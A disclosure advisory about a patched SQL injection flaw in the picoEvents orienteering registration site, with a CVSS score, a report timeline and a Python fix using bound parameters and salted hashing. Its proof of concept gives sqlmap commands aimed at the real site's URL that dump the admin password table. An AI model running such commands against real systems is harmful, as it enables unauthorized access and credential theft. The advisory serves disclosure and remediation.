entry.picotiming.ch - SQL-Injection Vulnerability (#mvid6)

Document Title:
===============
entry.picotiming.ch - SQL-Injection Vulnerability


mosi Vulnerability ID (mvid):
===============
6


Discovery Status:
=============
Patched - Public Disclosure


CVSSv2 Overall Score:
===============
9.6


CVSSv2 Vector:
==============
(AV:N/AC:M/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C/CDP:MH/TD:H/CR:M/IR:M/AR:H)
https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator?vector=(AV:N/AC:M/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C/CDP:MH/TD:H/CR:M/IR:M/AR:H)


Product & Service Introduction:
==============
picoSoft's picoTiming is timekeeping software for orienteering events that works together with SPORTident. To simplify registration for a course, the manufacturer also provides an online registration service branded picoEvents.
http://www.picosoft.ch/indextiming.html


Abstract:
==============
Simon Monai, together with Timo Kübler and Namo Flury, found an SQL injection vulnerability in the web form. It had already been abused to delete the competitions stored in the database on the web server.


Report Timeline:
==============
2017-06-19: Analysis of server attack requested by vendor
2017-06-19: Vulnerability detected
2017-06-19: Vendor informed
2017-06-20: Vendor acknowledged
2017-06-20: Vendor applied workaround
2017-06-21: Patch provided by mosi security research
2017-06-21: Patch faulty
2017-06-26: New patch by mosi security research
2017-06-26: Patch approved by mosi security research
2017-06-27: Public Disclosure


Affected Products:
=============
entry.picotiming.ch - Multisport Registration Page


Exploitation Technique:
=============
SQL Injection


Security Level:
=============
Critical


Technical Details & Description:
=============
Request method(s):
[+] GET

Vulnerable Module(s):
[+] http://www.picoevents.ch/entry/multisport/weiche_msp.php?recordID=95


Proof of Concept (PoC):
=============
Running the following commands in a shell on a Kali Linux installation recovers the administrator account passwords:

sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 --dbs
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS --tables
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --columns
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --dump

The results are alarming: the admin passwords are stored in clear text, so an attacker can log into the administrator interface and make changes.


Possible Solution:
============
Validate the GET parameters against SQL injection before they reach the database, and hash the stored passwords. A WAF can help prevent further attacks.
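The two fixes above, as an added example that is not the vendor's code: a Python stand-in for the recordID lookup of weiche_msp.php that rejects non-integer input and binds the value as a query parameter, plus salted password hashing for the admin table. The table and column names, and the in-memory SQLite database, are constructed for the demonstration.

```python
import hashlib
import hmac
import os
import re
import sqlite3

def build_demo_db():
    """Constructed stand-in for the picoEVENTS database (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE events (recordID INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE admin (username TEXT PRIMARY KEY, pw_hash TEXT, salt BLOB);
        INSERT INTO events VALUES (95, 'Multisport 2017'), (96, 'Night-O');
    """)
    return conn

def fetch_event(conn, raw_record_id):
    """Hardened lookup for the recordID GET parameter.

    1. Strict input check: recordID must be a plain decimal integer; anything
       else is rejected before it reaches the database.
    2. Parameter binding: the value is passed as a bound parameter, never
       concatenated into the SQL string, so it is always treated as data.
    """
    if not re.fullmatch(r"[0-9]+", raw_record_id):
        raise ValueError("recordID must be a positive integer")
    return conn.execute(
        "SELECT recordID, name FROM events WHERE recordID = ?",
        (int(raw_record_id),),
    ).fetchone()

def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; returns (hex digest, salt)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return digest.hex(), salt

def store_admin(conn, username, password):
    """Store only the salted hash, never the clear-text password."""
    pw_hash, salt = hash_password(password)
    conn.execute("INSERT INTO admin VALUES (?, ?, ?)", (username, pw_hash, salt))

def verify_admin(conn, username, password):
    """Recompute the hash with the stored salt and compare in constant time."""
    row = conn.execute("SELECT pw_hash, salt FROM admin WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    candidate, _ = hash_password(password, row[1])
    return hmac.compare_digest(candidate, row[0])
```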


Security Risk:
============
This vulnerability is rated critical (CVSSv2 9.6) and had already been abused.


Author / Credits:
============
mosi security research - Simon Monai (http://jongliertricks.ch/kontakt)


Public Disclosure:
============
2017-06-27 - https://jongliertricks.ch/mosi-security-research/40


----------------------------
https://jongliertricks.ch/mosi-security-research